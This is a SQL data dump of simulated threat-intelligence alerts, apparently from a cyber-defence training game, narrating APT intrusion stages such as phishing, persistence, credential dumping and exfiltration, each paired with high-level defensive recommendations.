(63, 12, 350, 4, 'Lateral Movement and Credential Access', '# Lateral Movement via Hijacked Credentials\n\n## Summary\nUtilizing hijacked credentials, the adversaries are expanding their presence across the network. This lateral movement allows them to access additional systems and data.\n\n## Details\n- **Credential Theft**: Credentials were harvested using keyloggers and memory scraping techniques.\n- **Access Points**: Compromised accounts are used to access shared drives, email servers, and other critical systems.\n- **Objective**: Broader network infiltration to locate valuable intelligence.\n\n## Next Steps\nThe adversaries will likely use hijacked satellite links to exfiltrate sensitive data, masking their C2 locations and avoiding detection.\n\n## Recommendations\n- Implement multi-factor authentication (MFA) to reduce the risk of credential misuse.\n- Monitor for unusual login patterns and access attempts to critical systems.', '2026-01-03 00:37:55'),
(64, 12, 351, 5, NULL, NULL, '2026-01-03 00:37:55'),
(65, 13, 352, 1, 'Analysis of Initial Network Breach', '### Summary\nFollowing the alert on suspicious access to the university network, further investigation has revealed that APT40 utilized spear-phishing emails to target university staff, leading to credential theft. These credentials were then used to access the university\'s internal network.\n\n### Detailed Findings\n- **Phishing Campaign**: APT40 crafted emails with attachments masquerading as legitimate maritime research documents, luring victims into opening them.\n- **Credential Harvesting**: Upon opening, malicious scripts captured login credentials, which were then used in lateral movement attempts.\n\n### Next Steps\nMonitor for signs of malware execution, as this is the typical progression post-initial access in APT40 operations.', '2026-01-03 00:42:39'),
(66, 13, 353, 2, 'Detection of Custom Malware Execution', '### Summary\nSubsequent to the initial breach, custom malware was detected executing within the compromised network. This malware is designed to blend with legitimate maritime research applications, making detection challenging.\n\n### Malware Profile\n- **Custom Build**: The malware shows characteristics unique to APT40, including obfuscated code and modular functionality.\n- **Capabilities**: It can execute commands, capture keystrokes, and exfiltrate data.\n\n### Recommendations\n- **Increased Monitoring**: Implement advanced monitoring for web shell installations as APT40 typically progresses to establishing persistence following malware execution.', '2026-01-03 00:42:39'),
(67, 13, 354, 3, 'Establishing Persistence via Web Shell', '### Summary\nAPT40 has been observed deploying web shells to maintain persistence within the compromised university network. These web shells provide ongoing access even if the initial breach is discovered and remediated.\n\n### Web Shell Indicators\n- **File Names and Locations**: Web shells are hidden within legitimate directories under misleading names.\n- **Command and Control**: Use of HTTP/S protocols to communicate with external servers.\n\n### Countermeasures\n- **File Integrity Monitoring**: Deploy monitoring solutions to detect unauthorized file changes or additions.\n- **Network Traffic Analysis**: Watch for anomalous outbound traffic indicative of data staging or exfiltration.', '2026-01-03 00:42:39'),
(68, 13, 355, 4, 'Lateral Movement to Secure Data Sources', '### Summary\nAPT40 has successfully moved laterally within the network, gaining access to secure data sources including databases containing sensitive maritime research.\n\n### Lateral Movement Tactics\n- **Credential Stuffing**: Utilization of harvested credentials to access different network segments.\n- **Remote Desktop Protocol (RDP)**: Exploiting RDP to move between systems and access secured data.\n\n### Next Steps\nPrepare for potential data exfiltration activities by analyzing network logs for large outbound data transfers, especially focusing on sonar technology schematics.', '2026-01-03 00:42:39'),
(69, 13, 356, 5, NULL, NULL, '2026-01-03 00:42:39'),
(70, 14, 357, 1, 'Analysis of Initial Compromise Vector', '### Overview\nFollowing the detection of suspicious web traffic attributed to a drive-by download, further analysis reveals the presence of a malicious downloader script embedded within a compromised website. This script is responsible for initiating the subsequent malicious activities.\n\n### Technical Details\n- **Infection Vector**: Compromised website hosting a malicious JavaScript file.\n- **Observed Behavior**: The script attempts to download and execute a secondary payload, likely a PowerShell script.\n\n### Next Steps\nMonitor for execution of PowerShell scripts, which may indicate the deployment of additional malware components or the initiation of further malicious actions.', '2026-01-03 00:50:36'),
(71, 14, 358, 2, 'PowerShell Script Analysis', '### Overview\nAfter the execution of a malicious PowerShell script, an in-depth investigation reveals its purpose in establishing persistence and facilitating further attacks.\n\n### Technical Details\n- **Script Functionality**: The script modifies registry keys to ensure the persistence of malware across system reboots.\n- **Indicators of Compromise**: Registry modifications detected in `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`.\n\n### Next Steps\nMonitor registry activity for additional modifications and prepare for potential credential theft attempts.', '2026-01-03 00:50:36'),
(72, 14, 359, 3, 'Persistence Mechanism and Impact', '### Overview\nThe persistence mechanism has been successfully established via registry modifications, allowing the malicious payload to survive system restarts.\n\n### Technical Details\n- **Impact**: Ensures the continued operation of malicious processes.\n- **Associated Risks**: Increased likelihood of credential dumping tools being deployed to harvest sensitive information.\n\n### Next Steps\nInitiate enhanced monitoring for credential theft activities, such as the use of Mimikatz or similar tools.', '2026-01-03 00:50:36'),
(73, 14, 360, 4, 'Credential Dumping Detection and Mitigation', '### Overview\nThe detection of credential dumping attempts using Mimikatz indicates an escalation in the attack, with the adversary aiming to harvest user credentials.\n\n### Technical Details\n- **Detected Activity**: Execution of Mimikatz binary or similar tools.\n- **Potential Exposure**: Compromise of user and administrative credentials.\n\n### Mitigation Steps\nImmediately rotate all credentials identified as potentially compromised and enforce multi-factor authentication (MFA) across the network.', '2026-01-03 00:50:36'),
(74, 14, 361, 5, 'Suspicious File Transfer Analysis', '### Overview\nSuspicious file transfers over SMB traffic have been detected, potentially indicating lateral movement or exfiltration activities.\n\n### Technical Details\n- **Observed Traffic**: Unusual SMB connections and file transfer patterns.\n- **Potential Objectives**: Data staging for exfiltration or deployment of ransomware payloads.\n\n### Next Steps\nIsolate affected systems and review transferred files for signs of ransomware payloads or sensitive data.', '2026-01-03 00:50:36'),
(75, 14, 362, 6, 'Data Encryption Activity and Ransom Note', '### Overview\nActive ransomware encryption processes have been detected, indicating the adversary\'s final objective to encrypt and hold data for ransom.\n\n### Technical Details\n- **Encryption Process**: Rapid file encryption observed across multiple directories.\n- **Ransom Note**: A note demanding payment in cryptocurrency for decryption keys has been identified.\n\n### Response Actions\nInitiate incident response protocols to contain the spread of encryption, engage in negotiation simulations, and explore decryption options without payment.', '2026-01-03 00:50:36'),
(76, 14, 363, 7, NULL, NULL, '2026-01-03 00:50:36'),
(77, 15, 364, 1, 'Analysis of Anomalous PowerShell Activity', '### Overview\nFollowing the detection of a suspicious web shell on the IIS server, further investigation has revealed anomalous PowerShell activities. These activities indicate that the attacker may be attempting to execute scripts remotely to escalate their privileges or install additional payloads.\n\n### Key Indicators\n- **PowerShell Execution Logs**: Multiple instances of PowerShell command execution were logged, originating from the compromised server.\n- **Obfuscation Techniques**: The commands were heavily obfuscated, a common technique used to evade detection.\n\n### Recommendations\n- **Immediate Review**: Conduct a thorough review of PowerShell logs across all servers.\n- **Restrict PowerShell Usage**: Implement restrictive policies to limit PowerShell script execution to trusted users only.', '2026-01-03 00:54:31'),
(78, 15, 365, 2, 'Discovery of Hidden Scheduled Task', '### Overview\nAfter observing anomalous PowerShell activity, a hidden scheduled task was discovered on the compromised server. This task is likely set up to ensure the attacker maintains persistence within the network.\n\n### Details\n- **Task Name**: The task was found under a misleading name resembling a legitimate system update.\n- **Execution Timing**: Scheduled to execute during off-peak hours to avoid detection.\n\n### Recommendations\n- **Task Audit**: Conduct a comprehensive audit of scheduled tasks on all critical systems.\n- **Security Policies**: Strengthen policies to alert on the creation of new scheduled tasks without proper authorization.', '2026-01-03 00:54:31');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(79, 15, 366, 3, 'Unauthorized Network Map Access Detected', '### Overview\nThe creation of a hidden scheduled task led to an incident where unauthorized access to the telecom network map was detected. This access suggests the attacker is preparing for lateral movement within the network.\n\n### Indicators\n- **Access Logs**: The logs show access by an unauthorized user account, possibly compromised through credential theft.\n- **Network Map Utility**: The access was directed at a utility used specifically by network engineers.\n\n### Recommendations\n- **Account Review**: Immediately review access permissions and enforce multi-factor authentication for all sensitive accounts.\n- **Monitor Tools**: Increase monitoring on network management tools to detect unusual access patterns.', '2026-01-03 00:54:31'),
(80, 15, 367, 4, 'Exfiltration of Call Detail Records', '### Overview\nThe final stage of the intrusion was marked by the exfiltration of call detail records (CDRs), confirming the adversary\'s objective.\n\n### Exfiltration Details\n- **Data Transfer**: Significant outbound data transfers were recorded, consistent with the volume of CDRs.\n- **Destination IP**: Transfers were directed towards an external server that has been linked to previous Gallium APT activities.\n\n### Recommendations\n- **Data Loss Prevention**: Implement DLP solutions to monitor and block unauthorized data transfers.\n- **Incident Response**: Initiate a full incident response procedure to assess the extent of the breach and remediate affected systems.', '2026-01-03 00:54:31'),
(81, 15, 368, 5, NULL, NULL, '2026-01-03 00:54:31'),
(82, 16, 369, 1, NULL, NULL, '2026-01-03 23:52:02'),
(83, 16, 370, 2, 'Macro Execution Insight', '### Context:\nUpon the detection of a suspicious macro-enabled document, further investigation revealed that the document contained obfuscated macro code designed to execute a malicious script. This script initiates the download of additional payloads, leading to the execution phase.\n\n### Next Steps:\nMonitor for unusual script executions and network traffic indicative of further payload downloads.', '2026-01-03 23:52:02'),
(84, 16, 371, 3, 'POWERSTATS Backdoor Analysis', '### Context:\nThe malicious script executed by the macro has installed the POWERSTATS backdoor, which is known for persistence mechanisms that allow attackers to maintain access to the system. This backdoor is commonly used by MuddyWater for further command execution and data exfiltration.\n\n### Next Steps:\nEnsure endpoint detection systems are updated to identify and block POWERSTATS activity.', '2026-01-03 23:52:02'),
(85, 16, 372, 4, 'C2 Communication Detected', '### Context:\nEncrypted communications have been detected with a known MuddyWater command and control (C2) server. This indicates active C2 communication, allowing for remote control and data exfiltration.\n\n### Next Steps:\nIsolate the infected systems to prevent further C2 interactions and gather network traffic logs for analysis.', '2026-01-03 23:52:02'),
(86, 16, 373, 5, 'Lateral Movement Patterns', '### Context:\nThere has been an attempt to move laterally across the network, likely using compromised credentials and exploiting network shares. This movement aims to expand the attack footprint within the agency\'s infrastructure.\n\n### Next Steps:\nConduct a thorough investigation of access logs and isolate affected network segments to prevent further lateral movement.', '2026-01-03 23:52:02'),
(87, 16, 374, 6, 'Credential Dumping Tactics', '### Context:\nCredential dumping activities have been identified, suggesting the use of tools like Mimikatz. This is a precursor for lateral movement and privilege escalation within the network.\n\n### Next Steps:\nInitiate a password reset for potentially compromised accounts and enhance monitoring for atypical login attempts.', '2026-01-03 23:52:02'),
(88, 16, 375, 7, 'Exfiltration Activity Alert', '### Context:\nFile transfer activities to an external server have been detected, indicating potential data exfiltration efforts by the attackers. This is a critical phase of the attack lifecycle.\n\n### Next Steps:\nBlock outbound connections to the identified external IPs and assess the types of data potentially exfiltrated.', '2026-01-03 23:52:02'),
(89, 16, 376, 8, 'Wiper Logic Activation', '### Context:\nThe execution of wiper logic has been detected, signaling the attacker\'s intent to destroy data and disrupt operations under the guise of ransomware.\n\n### Next Steps:\nInitiate backup restoration procedures and ensure data integrity checks are performed to verify the completeness of recovered data.', '2026-01-03 23:52:02'),
(90, 16, 377, 9, 'Forensic Artifact Analysis', '### Context:\nForensic artifact recovery has begun to understand the attack vector and methods used by MuddyWater. This is crucial for identifying weaknesses and preventing future attacks.\n\n### Next Steps:\nCollaborate with forensic experts to analyze recovered artifacts and compile an incident report for strategic improvements.', '2026-01-03 23:52:02'),
(91, 16, 378, 10, 'Mitigation and Remediation Summary', '### Context:\nComprehensive mitigation and remediation measures have been implemented, focusing on patching vulnerabilities, enhancing monitoring, and reinforcing security protocols.\n\n### Next Steps:\nConduct a post-incident review to evaluate the effectiveness of response actions and update security policies accordingly.', '2026-01-03 23:52:02'),
(92, 17, 379, 1, 'Analysis of Malicious Payload Execution', '# Analysis of Malicious Payload Execution\n\nFollowing the detection of a phishing email, a detailed investigation has identified the execution of a malicious payload on the target system. This payload, typically a Remote Access Trojan (RAT), allows the attacker to gain control over the infected system.\n\n## Key Findings:\n- **Payload Type:** The executed payload is consistent with APT1\'s known use of RATs to establish remote access.\n- **Execution Method:** The payload was executed via a script embedded in a seemingly benign document delivered through the phishing email.\n- **Next Steps:** Close monitoring is required to detect any persistence mechanisms that may be established by the attacker to maintain access.', '2026-01-04 00:59:40'),
(93, 17, 380, 2, 'Insight into Persistence Mechanisms', '# Insight into Persistence Mechanisms\n\nAfter executing the malicious payload, the attacker has likely installed a persistence mechanism to ensure continued access to the compromised system.\n\n## Key Techniques:\n- **Registry Modifications:** Changes to the system registry to enable the payload to execute upon system startup.\n- **Scheduled Tasks:** Creation of scheduled tasks that regularly trigger the payload.\n- **Service Creation:** Establishment of new services that run the malicious code in the background.\n\n## Implications:\nThe presence of these mechanisms suggests a strategic attempt to maintain long-term access. Monitoring for credential dumping is advised as the next phase in the attack lifecycle.', '2026-01-04 00:59:40'),
(94, 17, 381, 3, 'Credential Dumping Activity Overview', '# Credential Dumping Activity Overview\n\nThe persistence mechanisms have paved the way for the attacker to perform credential dumping, a technique used to extract user credentials from the compromised system.\n\n## Techniques Observed:\n- **LSASS Memory Dumping:** Access to Local Security Authority Subsystem Service (LSASS) memory to extract credentials.\n- **SAM Database Extraction:** Copying the Security Account Manager (SAM) database for offline analysis.\n- **Tools Used:** Use of known tools like Mimikatz to facilitate credential dumping.\n\n## Recommendations:\nImmediate action is required to prevent lateral movement within the network. Look out for data exfiltration attempts as potential next steps.', '2026-01-04 00:59:40'),
(95, 17, 382, 4, 'Data Exfiltration Attempt Analysis', '# Data Exfiltration Attempt Analysis\n\nFollowing credential dumping, the attacker has attempted to exfiltrate data from the target network.\n\n## Exfiltration Methods:\n- **Encrypted Channels:** Use of encrypted channels (e.g., HTTPS, VPN) to hide data transfer.\n- **Cloud Services:** Leveraging cloud storage services to exfiltrate data without arousing suspicion.\n- **FTP/SFTP:** Use of file transfer protocols to move data out of the network.\n\n## Detected Indicators:\n- Sudden spikes in outbound traffic.\n- Unusual access to cloud storage services.\n\n## Conclusion:\nThe detected data exfiltration attempt underscores the need for enhanced monitoring and response protocols to mitigate data loss and further unauthorized access.', '2026-01-04 00:59:40'),
(96, 17, 383, 5, NULL, NULL, '2026-01-04 00:59:40'),
(97, 18, 384, 1, 'Investigation of Spear Phishing Email', '### Overview\nThe initial access vector was identified as a spear phishing email targeting key personnel within the organization. The email contained a seemingly legitimate attachment that, once opened, executed a hidden script.\n\n### Analysis\n- **Sender:** The email originated from a spoofed address resembling a trusted partner.\n- **Content:** The attachment was a weaponized document with macros that, when enabled, triggered the download of a malicious payload.\n\n### Next Steps\n- **Immediate Action:** Advise recipients of similar emails to report and delete them without opening.\n- **Preparation for Next Alert:** Monitor systems for signs of script execution and unusual network activity.', '2026-01-04 02:06:57'),
(98, 18, 385, 2, 'Detection of Malicious PowerShell Activity', '### Overview\nFollowing the execution of the spear phishing attack, a malicious PowerShell script was detected. This script is designed to further compromise the network.\n\n### Analysis\n- **Script Functionality:** The script attempts to download additional payloads and establish a connection back to the attacker\'s command and control server.\n- **Indicators of Compromise (IoCs):** Unusual PowerShell commands observed, including obfuscated and encoded scripts.\n\n### Next Steps\n- **Mitigation:** Disable PowerShell scripting for non-administrative users and review execution logs.\n- **Preparation for Next Alert:** Monitor registry changes as the attacker may attempt to establish persistence.', '2026-01-04 02:06:57'),
(99, 18, 386, 3, 'Detection of Registry Modifications', '### Overview\nThe attacker has modified the registry to maintain persistence on targeted systems. This tactic ensures the malicious presence is sustained even after a reboot.\n\n### Analysis\n- **Registry Changes:** Specific keys related to startup and session management have been altered, pointing to unauthorized scripts.\n- **Persistence Mechanism:** Use of Run and RunOnce registry keys to ensure the script executes at startup.\n\n### Next Steps\n- **Immediate Action:** Restore original registry settings and remove unauthorized entries.\n- **Preparation for Next Alert:** Monitor for credential access attempts, which may indicate lateral movement.', '2026-01-04 02:06:57'),
(100, 18, 387, 4, 'Credential Dumping Activity Detected', '### Overview\nThe attacker is attempting lateral movement through credential dumping techniques. This is a critical phase where compromised credentials could lead to further infiltration.\n\n### Analysis\n- **Techniques Used:** Tools like Mimikatz have been detected, indicating attempts to extract credentials from memory.\n- **Targets:** Domain controllers and high-value systems are primary targets for credential harvesting.\n\n### Next Steps\n- **Mitigation:** Isolate affected systems and change all credentials for compromised accounts.\n- **Preparation for Next Alert:** Monitor network for encrypted traffic patterns indicating data exfiltration.', '2026-01-04 02:06:57'),
(101, 18, 388, 5, NULL, NULL, '2026-01-04 02:06:57'),
(102, 19, 389, 1, 'Analysis of APT10\'s Initial Access Techniques', '### Overview\nFollowing the alert of initial access through compromised MSP credentials, further analysis reveals that APT10 leveraged a combination of social engineering and spear-phishing attacks to acquire the necessary credentials. \n\n### Detailed Findings\n- **Phishing Campaign**: Targeted emails were sent to MSP employees, masquerading as official communications.\n- **Credential Harvesting**: APT10 used fake login portals to capture login details.\n\n### Next Steps\nFocus shifts to potential execution methods, with particular attention to DLL side-loading techniques known to be favored by APT10.', '2026-01-04 02:14:19'),
(103, 19, 390, 2, 'APT10\'s Use of DLL Side-Loading for Execution', '### Overview\nPost-execution analysis indicates that APT10 utilized DLL side-loading to run malicious code within trusted applications, bypassing security protocols.\n\n### Detailed Findings\n- **Target Application**: A legitimate aerospace CAD application was identified as the host for the side-loaded DLL.\n- **Malware Characteristics**: The malicious DLL was designed to trigger upon application start-up, ensuring seamless execution.\n\n### Next Steps\nInvestigations will now focus on how persistence is established post-execution, particularly through backdoor implants.', '2026-01-04 02:14:19'),
(104, 19, 391, 3, 'Establishing Persistence: Backdoor Implant Tactics', '### Overview\nAPT10\'s strategy for persistence involves deploying a stealthy backdoor implant that ensures ongoing access to the compromised systems.\n\n### Detailed Findings\n- **Backdoor Implant**: The implant is disguised as a legitimate system process, making detection challenging.\n- **Communication Channels**: The implant communicates with C2 servers using encrypted channels to evade detection.\n\n### Next Steps\nFocus will shift to identifying APT10\'s lateral movement techniques to access critical design servers within the aerospace network.', '2026-01-04 02:14:19'),
(105, 19, 392, 4, 'Lateral Movement: Accessing Design Servers', '### Overview\nAPT10 has successfully moved laterally within the network, reaching sensitive design servers crucial to aerospace projects.\n\n### Detailed Findings\n- **Credential Reuse**: Stolen credentials were used to authenticate with minimal detection.\n- **Network Mapping**: APT10 employed advanced network discovery tools to map the internal network architecture.\n\n### Next Steps\nAttention will now focus on how APT10 collects data from CAD repositories, preparing for exfiltration.', '2026-01-04 02:14:19'),
(106, 19, 393, 5, 'Data Collection from CAD Repositories', '### Overview\nAPT10 has begun the systematic collection of sensitive data from CAD repositories, focusing on proprietary designs and technologies.\n\n### Detailed Findings\n- **Data Targets**: High-value CAD files related to aerospace technologies were prioritized.\n- **Automated Scripts**: Custom scripts were used to streamline the data collection process.\n\n### Next Steps\nThe operation will now monitor the methods APT10 uses to exfiltrate the collected data, emphasizing the use of encrypted channels.', '2026-01-04 02:14:19'),
(107, 19, 394, 6, 'Exfiltration via Encrypted Channels', '### Overview\nAPT10 is in the process of exfiltrating the collected CAD data using encrypted channels to avoid detection by standard security measures.\n\n### Detailed Findings\n- **Encryption Protocols**: Utilized strong encryption to secure data in transit.\n- **Exfiltration Paths**: Data is being sent to overseas servers known to be associated with APT10.\n\n### Next Steps\nThe final phase will assess APT10\'s efforts to clean up and cover their tracks, focusing on defensive evasion techniques.', '2026-01-04 02:14:19'),
(108, 19, 395, 7, NULL, NULL, '2026-01-04 02:14:19'),
(109, 20, 396, 1, 'Execution of Malicious Script - Unlocked', '### Overview\nFollowing the detection of suspicious network activity, further investigation has revealed the execution of a potentially malicious script on multiple network endpoints. The script appears to connect to external command and control (C2) servers, indicating the possibility of an advanced persistent threat (APT) operation.\n\n### Key Findings\n- **Script Origin**: The script was deployed from an external IP address linked to known malicious activity.\n- **C2 Communication**: Established connections with C2 servers observed in previous Whitefly APT campaigns.\n- **Potential Impact**: If left unchecked, the script could allow attackers to execute further malicious activities within the network.\n\n### Recommendations\n- Conduct endpoint analysis to identify all systems affected by the script.\n- Isolate compromised systems to prevent further execution and communication with C2 servers.', '2026-01-04 02:15:53'),
(110, 20, 397, 2, 'Vcrodat Malware Persistence Mechanism - Unlocked', '### Overview\nThe investigation has progressed to identifying the persistence mechanisms employed by the Vcrodat malware identified in the healthcare network. Persistence is a key tactic used by the malware to maintain unauthorized access over an extended period.\n\n### Key Findings\n- **Registry Alterations**: Changes in the system registry to ensure malware execution upon startup.\n- **Scheduled Tasks**: Creation of hidden scheduled tasks to trigger the malware at specific intervals.\n- **System Services**: Manipulation of existing services to load malicious components.\n\n### Recommendations\n- Review and audit system registry and scheduled tasks for unauthorized entries.\n- Implement monitoring of system services to detect anomalies related to persistence mechanisms.', '2026-01-04 02:15:53'),
(111, 20, 398, 3, 'Compromised Open-Source Tool Identified - Unlocked', '### Overview\nDuring the analysis of persistence mechanisms, it was discovered that Whitefly APT has compromised an open-source tool widely used within the organization. This tool has been modified to evade defense mechanisms and facilitate lateral movement.\n\n### Key Findings\n- **Tool Modification**: Alterations to the source code to include backdoor functionality.\n- **Evasion Techniques**: The tool appears benign but contains hidden capabilities to bypass detection.\n- **Impact on Infrastructure**: The tool is deployed across several critical systems, amplifying the threat landscape.\n\n### Recommendations\n- Perform a comprehensive audit of open-source tools and validate their integrity.\n- Educate users on potential risks associated with unverified open-source software.', '2026-01-04 02:15:53'),
(112, 20, 399, 4, 'Unauthorized Credentials Accessed - Unlocked', '### Overview\nThe compromised open-source tool has facilitated unauthorized access to sensitive credentials, enabling lateral movement within the network. This breach exposes critical systems to further exploitation.\n\n### Key Findings\n- **Credential Dumping**: Use of the tool to extract login credentials from memory and secured storage.\n- **Privileged Access**: Attacker gained administrative privileges on several key systems.\n- **Lateral Movement**: Access used to pivot across the network to other high-value targets.\n\n### Recommendations\n- Implement multi-factor authentication to mitigate unauthorized access.\n- Regularly update and change credentials, especially for privileged accounts.', '2026-01-04 02:15:53'),
(113, 20, 400, 5, 'Unusual Data Access Patterns Detected - Unlocked', '### Overview\nA pattern of unusual data access has been identified, indicating potential data collection activities by the threat actor. The access patterns suggest targeted extraction of sensitive information.\n\n### Key Findings\n- **Data Queries**: High-frequency access to patient records and financial data.\n- **Anomalous Behavior**: Access occurring outside normal operating hours and from unexpected locations.\n- **Data Volume**: Significant increase in data retrieval activities, consistent with data staging for exfiltration.\n\n### Recommendations\n- Enhance data access monitoring and alerting capabilities.\n- Conduct data integrity checks to ensure no unauthorized modifications have occurred.', '2026-01-04 02:15:53'),
(114, 20, 401, 6, 'Data Exfiltration Attempt Blocked - Unlocked', '### Overview\nA data exfiltration attempt has been detected and successfully blocked. The perpetrators attempted to transfer sensitive data to external locations using encrypted channels.\n\n### Key Findings\n- **Exfiltration Vector**: Attempts made through secure HTTP channels to obfuscate activities.\n- **Blocked Channels**: Network defenses successfully identified and halted suspicious data transfers.\n- **Threat Actor Tactics**: Use of encryption and compression to mask data exfiltration attempts.\n\n### Recommendations\n- Strengthen perimeter defenses and encryption detection mechanisms.\n- Conduct a full review of attempted exfiltration activities to identify any potential gaps in security.', '2026-01-04 02:15:53'),
(115, 20, 402, 7, NULL, NULL, '2026-01-04 02:15:53'),
(116, 21, 403, 1, 'Analysis of Suspicious Email Attachment', '### Context and Analysis\n\nAfter detecting a suspicious email attachment, it was identified as a malicious document containing macros designed to execute a remote script. This script aims to install a malicious browser extension, providing attackers with a foothold for further operations.\n\n### Recommendations\n- **Immediate Action:** Block and quarantine the email and any similar ones identified in the network.\n- **User Awareness:** Conduct an awareness campaign focusing on recognizing phishing emails and suspicious attachments.\n\n### Next Steps\nMonitoring network traffic for unusual patterns that may indicate the installation of unauthorized browser extensions.', '2026-01-04 02:18:47'),
(117, 21, 404, 2, 'Malicious Browser Extension Installation', '### Context and Analysis\n\nPost-installation of the malicious browser extension, communication with known command and control (C2) servers was observed. The extension is designed to capture user credentials and session cookies, feeding them back to the attackers.\n\n### Recommendations\n- **Immediate Action:** Remove any unauthorized extensions from all systems, and conduct a security review of all browser extensions.\n- **Network Defense:** Implement network monitoring to detect unusual data flows to external servers.\n\n### Next Steps\nInvestigate potential execution of additional payloads, such as BabyShark VBS scripts, from the compromised host.', '2026-01-04 02:18:47'),
(118, 21, 405, 3, 'Execution of BabyShark VBS Script', '### Context and Analysis\n\nThe BabyShark VBS script has been executed, establishing persistence on the compromised systems. This script allows for continuous monitoring and data collection without detection, targeting sensitive information related to nuclear policy.\n\n### Recommendations\n- **Immediate Action:** Isolate affected systems to prevent further spread.\n- **System Hardening:** Review and enhance endpoint security measures to detect VBS script execution.\n\n### Next Steps\nConduct a thorough investigation into unauthorized network access attempts, focusing on lateral movement across the internal network.', '2026-01-04 02:18:47'),
(119, 21, 406, 4, 'Detection of Unauthorized Network Access', '### Context and Analysis\n\nEvidence of lateral movement within the network has been detected. The adversaries are leveraging compromised credentials to access sensitive areas of the network, specifically targeting documents and communications related to nuclear policy.\n\n### Recommendations\n- **Immediate Action:** Revoke compromised credentials and enforce a network-wide password reset.\n- **Network Segmentation:** Implement tighter access controls and segment sensitive data to limit unauthorized access.\n\n### Next Steps\nPrepare for potential data exfiltration attempts by enhancing monitoring of outgoing traffic and securing data transfer protocols.', '2026-01-04 02:18:47'),
(120, 21, 407, 5, NULL, NULL, '2026-01-04 02:18:47'),
(121, 22, 408, 1, 'Analysis of Supply Chain Compromise', '### Overview\nAPT41 has initiated the operation with a sophisticated supply chain attack. This initial access highlights their capability to infiltrate trusted third-party vendors, leveraging them as conduits into the primary target infrastructure. \n\n### Key Indicators\n- **Compromised Vendor**: Evidence suggests a vulnerability in the vendor\'s software update mechanism was exploited.\n- **Payload Delivery**: Malicious payload embedded within legitimate updates.\n\n### Next Steps\nPrepare for potential **Malware Deployment** as the adversary typically uses the established foothold to inject backdoor malware into the compromised systems.', '2026-01-04 02:21:52'),
(122, 22, 409, 2, 'Backdoor Malware Deployment Detected', '### Overview\nFollowing the supply chain compromise, APT41 has deployed backdoor malware to maintain clandestine access to the systems. This malware is likely custom-built and designed to evade detection.\n\n### Malware Characteristics\n- **Type**: Custom backdoor with advanced evasion features.\n- **Command and Control**: Utilizes encrypted communications to a remote server.\n\n### Next Steps\nThe focus will likely shift to **Establishing Persistence**. Anticipate techniques such as rootkit deployment to ensure long-term access and stealth.', '2026-01-04 02:21:52'),
(123, 22, 410, 3, 'Persistence Mechanism through Rootkit Deployment', '### Overview\nAPT41 has successfully established persistence by installing a rootkit. This rootkit operates at a low level, providing the attackers with the ability to maintain access and conceal their activities effectively.\n\n### Rootkit Details\n- **Capabilities**: Hides files, processes, and network connections.\n- **Installation**: Likely implanted through escalated privileges gained via malware.\n\n### Next Steps\nPrepare for **Lateral Movement** as the attackers might attempt to access sensitive databases, including those containing Personally Identifiable Information (PII).', '2026-01-04 02:21:52'),
(124, 22, 411, 4, 'Lateral Movement Towards PII Databases', '### Overview\nAPT41 has progressed to lateral movement, targeting databases containing PII. This phase involves exploiting compromised credentials and leveraging them to navigate through the network.\n\n### Techniques Observed\n- **Credential Dumping**: Use of tools to extract credentials from memory.\n- **Network Scanning**: Mapping out network architecture to identify PII storage.\n\n### Next Steps\nExpect imminent **Data Exfiltration** of gaming source code and PII. Implement network monitoring and data leakage prevention measures immediately.', '2026-01-04 02:21:52'),
(125, 22, 412, 5, NULL, NULL, '2026-01-04 02:21:52'),
(126, 23, 413, 1, 'In-Depth Analysis: Supply Chain Compromise', '### Overview\nThe recent detection of a **Supply Chain Compromise** indicates a sophisticated attempt to infiltrate our network through third-party software or services. This method is commonly employed by APT41 to bypass traditional security measures by embedding malicious code within trusted updates or applications.\n\n### Indicators of Compromise (IoCs)\n- Newly introduced DLL files in application directories.\n- Unusual outbound traffic patterns from software update services.\n\n### Recommended Actions\n- Conduct a comprehensive review of all third-party software sources.\n- Isolate compromised systems and initiate a forensic investigation.\n- Enhance monitoring on network traffic associated with supply chain services.\n\n### Next Steps\nPrepare for potential **Suspicious Script Execution**, as attackers might leverage compromised software to execute malicious scripts.', '2026-01-04 04:11:48'),
(127, 23, 414, 2, 'Investigation: Suspicious Script Execution Patterns', '### Overview\nFollowing the supply chain compromise, a **Suspicious Script Execution** has been detected. APT41 often utilizes scripts to automate the deployment of their payloads and establish a foothold in the network.\n\n### Key Findings\n- Scripts attempting to execute PowerShell commands with obfuscation techniques.\n- Log entries indicating unauthorized script activity during off-peak hours.\n\n### Recommendations\n- Implement script-blocking policies at the endpoint level.\n- Increase audit logging of PowerShell and other script execution frameworks.\n- Conduct user awareness training on recognizing phishing attempts that may lead to script execution.\n\n### Next Steps\nRemain vigilant for **Persistence Mechanism Activation**, as attackers may seek to maintain access to the compromised systems.', '2026-01-04 04:11:48'),
(128, 23, 415, 3, 'Insight: Persistence Mechanism Activation', '### Overview\nThe detection of a **Persistence Mechanism Activation** suggests that attackers are attempting to maintain long-term access to the compromised environment. APT41 may use various methods such as registry modifications or scheduled tasks.\n\n### Key Indicators\n- Creation of new registry keys pointing to unknown executables.\n- Scheduled tasks set to execute at irregular intervals.\n\n### Mitigation Strategies\n- Audit and clean registry entries associated with unauthorized applications.\n- Review and disable suspicious scheduled tasks.\n- Deploy Endpoint Detection and Response (EDR) tools to monitor persistence techniques.\n\n### Next Steps\nPrepare to intercept **Lateral Movement**, as attackers may attempt to expand their access across the network.', '2026-01-04 04:11:48'),
(129, 23, 416, 4, 'Analysis: Lateral Movement Detected', '### Overview\n**Lateral Movement** has been detected, indicating that the attackers are attempting to spread their foothold within the network. APT41 often uses stolen credentials and exploits to navigate through systems.\n\n### Evidence Collected\n- Unauthorized access attempts on multiple networked devices.\n- Usage of compromised credentials to access sensitive systems.\n\n### Defensive Measures\n- Implement network segmentation to limit lateral movement capabilities.\n- Conduct a full credential reset, prioritizing high-privilege accounts.\n- Utilize honeypots to detect unauthorized movement attempts.\n\n### Next Steps\nFocus on preventing **Data Exfiltration Attempts**, as attackers may attempt to extract valuable data before detection.', '2026-01-04 04:11:48'),
(130, 23, 417, 5, NULL, NULL, '2026-01-04 04:11:48'),
